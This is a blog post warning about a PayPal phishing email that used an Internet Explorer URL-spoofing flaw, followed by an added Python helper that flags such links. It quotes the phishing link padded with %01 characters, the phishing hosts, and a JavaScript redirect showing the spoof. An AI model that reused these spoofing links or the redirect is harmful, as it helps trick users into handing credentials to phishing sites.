New, sneaky, evil PayPal spoof.

Mike Outmesguine points us to yet another new riff on the classic PayPal scam (click thumbnail for full-size image):


I got this email that looks like it came from PayPal. Of course, I didn't believe it for a second. But I'm sure others would. Digging deeper, the URL redirects people to a site in China that uses the IE URL spoof to seem like it's sitting at paypal.com. Insidious! I reported this to Paypal and they confirmed it's a spoof site. Here's the breakdown:

1. URL included in the original email:

<a href="http://www.paypal.com%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01%01@pp.youlikeshe.com ">click here</a>

2. jump-off site pp.youlikeshe.com

3. Actual site being loaded (remove spaces to activate): www . Epack . Ch/p/verify.htm

4. Spoofed to appear as www.paypal.com using the IE URL spoof vulnerability shown here:

<script language="JavaScript">
location.href=unescape('http://www.paypal.com%01@www.epack.ch/p/verify.htm');
</script>

Microsoft has not released a patch for this URL vulnerability. Now it seems there is a real-world attack, albeit only to Paypal members so far. Sneaky buggers!

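For readers who want to see exactly why the link above lands somewhere other than PayPal, here is a short added example (not from the post or from Mike's breakdown) that uses only Python's standard library to split such a URL the way the URL syntax defines it: everything before the `@` in the authority is userinfo, and the real host is what follows it. The sample links are constructed to mirror the two URLs in the post; the check names and the `analyze` function are this example's own, and it is a mail- or proxy-side triage helper rather than a description of how IE itself behaved.

```python
"""Added example: reveal the real host behind a 'user@host' spoof link and flag it."""
from urllib.parse import urlsplit, unquote

# Constructed samples modelled on the links quoted in the post.
SPOOFED_HREF = "http://www.paypal.com" + "%01" * 24 + "@pp.youlikeshe.com"
REDIRECT_TARGET = "http://www.paypal.com%01@www.epack.ch/p/verify.htm"
LEGIT_LINK = "http://www.paypal.com/cgi-bin/webscr"


def real_host(url: str) -> str:
    """Host the browser will actually connect to (text after the last '@')."""
    return urlsplit(url).hostname or ""


def analyze(url: str) -> dict:
    """Return what the link displays versus where it goes, plus triage reasons.

    Reasons raised:
      userinfo-before-at           - an '@' in the authority; rare in legitimate web links
      control-chars-in-userinfo    - %01-style bytes used to push the real host out of view
      userinfo-looks-like-hostname - the decoy before '@' is shaped like a domain name
    """
    parts = urlsplit(url)
    netloc = parts.netloc
    userinfo = netloc.rsplit("@", 1)[0] if "@" in netloc else ""
    decoded = unquote(userinfo)  # turns %01 into the raw control byte \x01
    reasons = []
    if userinfo:
        reasons.append("userinfo-before-at")
        if any(ord(c) < 0x20 for c in decoded):
            reasons.append("control-chars-in-userinfo")
        if "." in decoded:
            reasons.append("userinfo-looks-like-hostname")
    return {
        "displayed": decoded.strip("\x01") if decoded else (parts.hostname or ""),
        "actual_host": parts.hostname or "",
        "path": parts.path,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


if __name__ == "__main__":
    for link in (SPOOFED_HREF, REDIRECT_TARGET, LEGIT_LINK):
        verdict = analyze(link)
        print(f"{verdict['displayed']!r:24} -> {verdict['actual_host']:20} "
              f"suspicious={verdict['suspicious']} {verdict['reasons']}")
```

Running it shows the email link displaying `www.paypal.com` but connecting to `pp.youlikeshe.com`, and the redirect target connecting to `www.epack.ch` at `/p/verify.htm`, while the plain PayPal link raises nothing. The `@`-in-authority check alone is a useful mail-gateway rule; the control-character check catches the specific padding trick the post describes.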
Update/Correction: BoingBoing reader Fraser Cole in Ottawa says, "Hello, just a friendly note regarding the PayPal scam. I'm probably not the first to point out that the final destination site is in the .ch domain, which of course is Switzerland, not China. Maybe since they're in Europe they can be tracked down easier?"